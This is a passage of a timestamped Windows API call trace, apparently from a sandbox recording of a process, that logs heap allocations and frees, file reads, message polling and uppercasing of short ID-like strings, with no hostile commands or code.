(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0208.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0208.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ec020 [0208.153] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0208.153] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0208.155] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x50f9, lpOverlapped=0x0) returned 1 [0208.156] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x150f9) returned 0x2aae878 [0208.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ec020 | out: hHeap=0x2af0000) returned 1 [0208.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0208.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0208.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0208.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x150f9) returned 0x2ac3980 [0208.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.163] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0208.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0208.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x150f9) returned 0x2aae878 [0208.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.165] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0208.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0208.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0208.166] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0208.166] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0208.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0208.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x150f9) returned 0x2aae878 [0208.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0208.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa858 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0208.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0208.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x150f9) returned 0x37c0048 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0208.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0208.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0208.171] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0208.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0208.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0208.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0208.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0208.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0208.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0208.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0208.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.174] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0208.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0208.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.174] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.174] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0208.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa38 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.174] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.175] 